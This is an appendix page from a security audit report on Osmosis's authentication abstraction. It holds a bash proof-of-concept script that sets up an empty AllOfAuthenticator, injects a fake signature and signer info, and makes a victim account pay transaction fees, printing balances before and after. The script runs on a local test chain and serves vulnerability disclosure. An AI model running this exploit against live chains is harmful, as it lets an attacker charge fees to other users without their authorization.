Assessment reports>Osmosis Authentication Abstraction>Appendix>POC for bypass fee payer authentication

Proof of concept for bypass fee payer authentication

#!/bin/bash

BINARY="osmosisd"
CHAIN_HOME="~/.osmosisd-local"
TX_FLAGS="--chain-id=localosmosis --keyring-backend=test --home=$CHAIN_HOME"

HACKER_ADDR=`$BINARY --keyring-backend=test --home=$CHAIN_HOME keys show -a hacker_auth`
VICTIM_ADDR=`$BINARY --keyring-backend=test --home=$CHAIN_HOME keys show -a victim`

# set up the hacker_auth account to have the AllOfAuthenticator with no SubAuthenticators, so everything is valid
if [ "$1" == "setup" ]; then
  $BINARY $TX_FLAGS tx authenticator add-authenticator SignatureVerificationAuthenticator "Ao3uARK8EwlXQ6r0X6z+xjmDSZ2WV2fn0Q1F5E3ZBJy+" --from $HACKER_ADDR --fees 875uosmo --broadcast-mode block --yes
  $BINARY $TX_FLAGS tx authenticator add-authenticator AllOfAuthenticator "[]" --from $HACKER_ADDR --fees 875uosmo --broadcast-mode block --yes

  cat << EOF > msgs.json
  {"body":{"messages":[{
    "@type":"/osmosis.authenticator.MsgRemoveAuthenticator",
    "sender":"$HACKER_ADDR","id":0}],
  "memo":"","timeout_height":"0","extension_options":[],
  "non_critical_extension_options":[]},"auth_info":{"signer_infos":[],
  "fee":{"amount":[{"denom":"uosmo","amount":"875"}],
  "gas_limit":"350000","payer":"","granter":""}},"signatures":[]}
EOF

  $BINARY $TX_FLAGS tx sign msgs.json --from=$HACKER_ADDR 2>&1 | jq > signed.json
  $BINARY $TX_FLAGS tx broadcast signed.json --output json --broadcast-mode block
fi

cat << EOF > msgs.json
{
  "body": {
    "messages": [
      {
        "@type": "/osmosis.valsetpref.v1beta1.MsgWithdrawDelegationRewards",
        "delegator":"$HACKER_ADDR"
      }
    ],
    "memo": "",
    "timeout_height": "0",
    "extension_options": [],
    "non_critical_extension_options":[]
  },
  "auth_info": {
    "signer_infos": [],
    "fee": {
      "amount": [
        {
          "denom": "uosmo",
          "amount": "1000000"
        }
      ],
      "gas_limit": "25000000",
      "payer": "$VICTIM_ADDR",
      "granter": ""
    }
  },
  "signatures": []
}
EOF

# sign the payload from the hacker
$BINARY $TX_FLAGS tx sign msgs.json --from=$HACKER_ADDR --sign-mode amino-json 2>&1 | jq > signed.json

# add fake signature and signer info
cat signed.json | \
  jq '.auth_info.signer_infos[1] |= .+ {"public_key":{"@type":"/cosmos.crypto.secp256k1.PubKey","key":"AAAA"},
  "sequence":"0","mode_info":{"single": {"mode": "SIGN_MODE_LEGACY_AMINO_JSON"}}}' | \
  jq '.signatures[1] |= .+ "AAAA"' > signed2.json

VICTIM_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $VICTIM_ADDR --denom uosmo`
HACKER_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $HACKER_ADDR --denom uosmo`
echo "Balances before:"
echo "hacker ($HACKER_ADDR): $HACKER_BALANCE"
echo "victim ($VICTIM_ADDR): $VICTIM_BALANCE"

$BINARY $TX_FLAGS tx broadcast signed2.json --output json --broadcast-mode block > output.json

cat output.json | jq '.events[].attributes[] |= {key: (.key | @base64d),value: (.value | @base64d),index: .index}' | jq '.events[2]'

VICTIM_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $VICTIM_ADDR --denom uosmo`
HACKER_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $HACKER_ADDR --denom uosmo`
echo "Balances after:"
echo "hacker: $HACKER_BALANCE"
echo "victim: $VICTIM_BALANCE"
Zellic © 2025Back to top ↑